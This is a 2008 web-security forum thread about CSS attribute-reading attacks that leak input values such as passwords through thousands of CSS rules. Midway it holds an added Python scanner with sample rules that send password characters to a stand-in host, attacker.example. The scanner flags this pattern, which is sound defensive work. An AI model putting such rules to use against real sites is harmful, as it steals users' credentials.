CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 22, 2008 10:41AM

Looking for feedback =)

http://sirdarckcat.blogspot.com/2008/10/about-css-attacks.html
http://www.thespanner.co.uk/wp-content/uploads/2008/10/the_sexy_assassin2ppt.zip

What do you think, guys? A lot of people have used the Gmail overlay stuff hehe, I'm receiving lots of "overlaysuccesfull" emails =D. Twitter victims are not that many: http://search.twitter.com/search?q=I+love+coconuts

These last ones could be used for CSS worms =)

The attribute reading stuff I think deserves some sort of discussion, and the CSSH-mon is pretty scary, isn't it? What do you guys think?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 22, 2008 02:47PM

As I already told you guys via IM - the attribute reader is at top position in my this year's list of client side trickery. Absolutely awesome work - who needs click-jacking anyway when you can read passwords with thousands of lines of CSS :)

Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 26, 2008 02:20PM

hey!
thanks mario ;)
The best attack I've thought of still requires 2 requests.. but I hope a one-request attack can be found =)

Greetz!!

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 26, 2008 02:48PM

One request is possible for 6 char values :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 26, 2008 05:00PM

[\x11-\x7F] Range?

What's the size?

Greetz!!

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 26, 2008 05:27PM

35152 rules all lowercase letters

I've PM'd you the poc

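A thread like this is worth reading from the defensive side too: the stylesheets described here are huge (tens of thousands of rules, a 2MB download) and every rule pairs an attribute-substring selector with a url() fetch to a host the page does not own. The scanner below, an added example and not code from the thread or from the css_tokens.php PoC, flags exactly that shape; the attacker.example host, the sample rules and the rule threshold are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample: three rules in the shape of a CSS attribute-reading
# stylesheet (substring selector + external url()), plus two benign rules.
SAMPLE_CSS = """
body { background: #fff; }
a[href^="https://"] { color: green; }
input[name=pw][value^="a"] { background: url(https://attacker.example/log?p=a); }
input[name=pw][value^="b"] { background: url("https://attacker.example/log?p=b"); }
input[name=pw][value$="z"] { background-image: url('https://attacker.example/log?s=z'); }
"""

# Naive rule splitter: good enough for flat stylesheets without @media nesting.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# [attr^=, [attr$=, [attr*=  are the selectors that leak one substring each.
ATTR_SUBSTRING_RE = re.compile(r"\[\s*[\w-]+\s*[\^$*]=")
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)")

def find_exfil_rules(css, site_host):
    """Return (selector, url) pairs where an attribute-substring selector
    triggers a fetch from a host other than site_host."""
    hits = []
    for sel, body in RULE_RE.findall(css):
        if not ATTR_SUBSTRING_RE.search(sel):
            continue
        for url in URL_RE.findall(body):
            host = urlparse(url.strip()).hostname
            if host and host != site_host:
                hits.append((sel.strip(), url.strip()))
    return hits

def assess(css, site_host, rule_threshold=1000):
    """Summarise a stylesheet: rule count, suspicious rule count and a verdict.
    One or two hits deserve a look; thousands (as in the thread) are a block."""
    hits = find_exfil_rules(css, site_host)
    total = len(RULE_RE.findall(css))
    verdict = "ok"
    if hits:
        verdict = "block" if len(hits) >= rule_threshold else "review"
    return {"total_rules": total, "suspicious": len(hits), "verdict": verdict}
```

A benign `a[href^="https://"]` rule is not reported because it fetches nothing, so the signal is the selector and the cross-origin fetch together, not attribute selectors on their own.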
Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 27, 2008 05:35AM

Can you send me the rules too plz?

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 07:00AM

Yeah sure, I just didn't want to overload my server. PM'd now

Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 27, 2008 07:03AM

Thx - I'll slashdot it asap :)

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 07:19AM

LOL I'll send you the bandwidth bill

Re: CSS The Sexy Assassin
Posted by: zeno
Date: October 27, 2008 11:21AM

I was at Bluehat ( http://www.cgisecurity.org/2008/10/my-trip-to-blue.html ) and saw your talk. The CSSH demo was good at automatically demonstrating the problem.

Good work.

- zeno

Re: CSS The Sexy Assassin
Posted by: thornmaker
Date: October 27, 2008 12:03PM

Thanks Zeno! I'm glad you liked it. It was kinda awkward having to push all the PoC's until the end, but hopefully everyone followed :)

Re: CSS The Sexy Assassin
Posted by: id
Date: October 27, 2008 02:37PM

If you need something hosted, PM me.

-id

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:02PM

@id

Thanks

The script itself is a CPU hog and it generates a 2MB stylesheet on each request, so I dunno if you'd wanna host it. I could just post the static output of the HTML file.

Re: CSS The Sexy Assassin
Posted by: id
Date: October 27, 2008 03:11PM

This box is a quad 2.8GHz, mostly just doing nothing, so I doubt it would hurt it.

-id

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:16PM

Ok cool, nice one, thanks. I'll PM you the source (PHP btw).

Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:54PM

Big thanks to ID for hosting

http://sla.ckers.org/files/css_tokens.php

The original work was by sirdarckcat; I've just brute-forced the stylesheet in one request.

Re: CSS The Sexy Assassin
Posted by: Raz0r
Date: November 03, 2008 02:40PM

Really interesting idea of using CSS for attribute reading. But don't you think there is more theory than practical usage? Under what circumstances and conditions could that be used in real life? I hardly believe that CSS attribute reading could be useful in XSS...

http://Raz0r.name - a web-security blog ( in Russian )

Re: CSS The Sexy Assassin
Posted by: kuza55
Date: November 04, 2008 05:19AM

Raz0r Wrote:
-------------------------------------------------------
> Really interesting idea of using CSS for attribute
> reading. But don't you think that there is more
> theory than the practical usage? Under what
> circumstances and conditions that could be used in
> real life? I hardly believe that CSS attribute
> reading could be useful in XSS...

This could potentially be used to attack a target running NoScript, or bypass XSS Filters.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: CSS The Sexy Assassin
Posted by: Raz0r
Date: November 04, 2008 11:18AM

Thx, now I see. But hasn't NoScript implemented protection against cssar yet?

Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: November 04, 2008 11:19AM

But not with 32K selectors minimum for alphanumeric values - it's a PoC and not an exploit imho. But very interesting anyway.

Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: November 05, 2008 11:47AM

Yeah, we haven't implemented any exploits using this.. anyway, there's definitely the possibility..

There's also the fact that if the target website uses HTML Purifier or something like that, this may (depends) make a successful attack..

Greetz!!
